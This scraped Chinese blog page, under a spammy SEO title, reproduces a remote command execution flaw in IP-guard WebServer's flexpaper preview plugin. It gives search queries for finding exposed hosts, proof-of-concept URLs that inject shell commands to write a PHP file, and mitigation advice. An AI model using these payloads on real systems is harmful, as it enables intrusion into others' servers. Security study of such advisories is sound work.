当前位置: 首页 > news >正文

刚刚济南最新发布百度关键词优化推广

刚刚济南最新发布,百度关键词优化推广,网页游戏挂机软件,做网站手机版文章目录 一、漏洞说明二、影响版本三、资产测绘四、漏洞复现五、修复建议 一、漏洞说明 IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件#xff0c;旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 IP-guard Webserver远程命令执行漏… 文章目录 一、漏洞说明二、影响版本三、资产测绘四、漏洞复现五、修复建议 一、漏洞说明 IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 IP-guard Webserver远程命令执行漏洞RCE的问题是因为旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper使用的这个插件版本存在远程命令执行漏洞新版本已不再使用 flexpaper。 二、影响版本 受影响的范围即有使用文件预览功能的web系统 溢信科技 IP-guard4.81.0307.0三、资产测绘 Fofa语法 appIP-guard Hunter语法 web.titleIP-guard四、漏洞复现 1、来到web访问界面 2、bp抓包修改数据包 poc: /ipg/static/appr/lib/flexpaper/php/view.php?doc1.jpgformatswfisSplittruepage%7C%7Cecho^%3C?phpphpinfo();?^%3E%3Esany.php /ipg/static/appr/lib/flexpaper/php/view.php?doc11.jpgformatswfisSplittruepage||echo123456test.txt/ipg/static/appr/lib/flexpaper/php/test.txt可执行写入的命令可造成重大危害。 五、修复建议 临时防护方案 1.加强系统和网络的访问控制修改防火墙策略不将非必要服务暴露于公网 2.在公网部署的系统通过WAF限制外网对/ipg/static/appr/lib/flexpaper/php/view.php路径的访问 3.定期对服务器上的网站后门文件进行及时查杀。正式防护方案 官方已修复该漏洞建议用户更新到安全版本。 安全版本: IP-guard WebServer 4.81.0307.0 下载链接 https://www.ip-guard.net/
http://www.huolong8.cn/news/108169/

相关文章:

  • 单页网站cpa虚拟主机wordpress 采集 入库
  • 做物流的都有哪些网站安居客做网站
  • wordpass建设网站流程企业官网模版制作
  • 自己建网站花钱吗龙岩网站推广
  • 做网站开发经营范围网站开发费用怎么做账
  • 商务网站开发目的博罗中山网站建设
  • 网站模板修改wordpress 漏洞 2014
  • 网站建设实物实训目的网站版块设计教程
  • 广州网站建设乐云seo模板中心外贸流程中有哪些主体单位
  • 网站分站系统网站logo的颜色与网页的颜色
  • 做背景图 网站重庆 建站 价格
  • 网站产品链接怎么做西安php网站建设
  • 信息中心完成网站建设苏州街网站建设
  • 网站建设上机考试题目网站建设怎么入会计账
  • wordpress自动创建子站网页图
  • 赣州房产网站建设网站开发过程会遇到的问题
  • 网站中加入百度地图合肥建设工程竣工结算备案网站
  • 微信安装seo博客
  • 如何制作自己的网站的邮箱wordpress自己写特效
  • 南京模板做网站win10 wordpress安装教程
  • 天津开发区网站建设给微商做网站
  • 网站开发 验收周期免费h5页面制作工具
  • h5可以来做网站吗银川微信网站制作
  • 威海 网站建设公司做网站入什么科目
  • 做网站沈阳网站建设的部署与发布
  • 网站用asp还是php网站后台登陆不进去是怎么回事
  • 西宁市营销网站建设公司游戏加盟招商
  • 购物网站首页源码2017网站建设公司排名
  • 网站建设捌金手指下拉一中国制造货源网一件代发
  • 如何做宣传推广的网站链接网站建设属于什么工作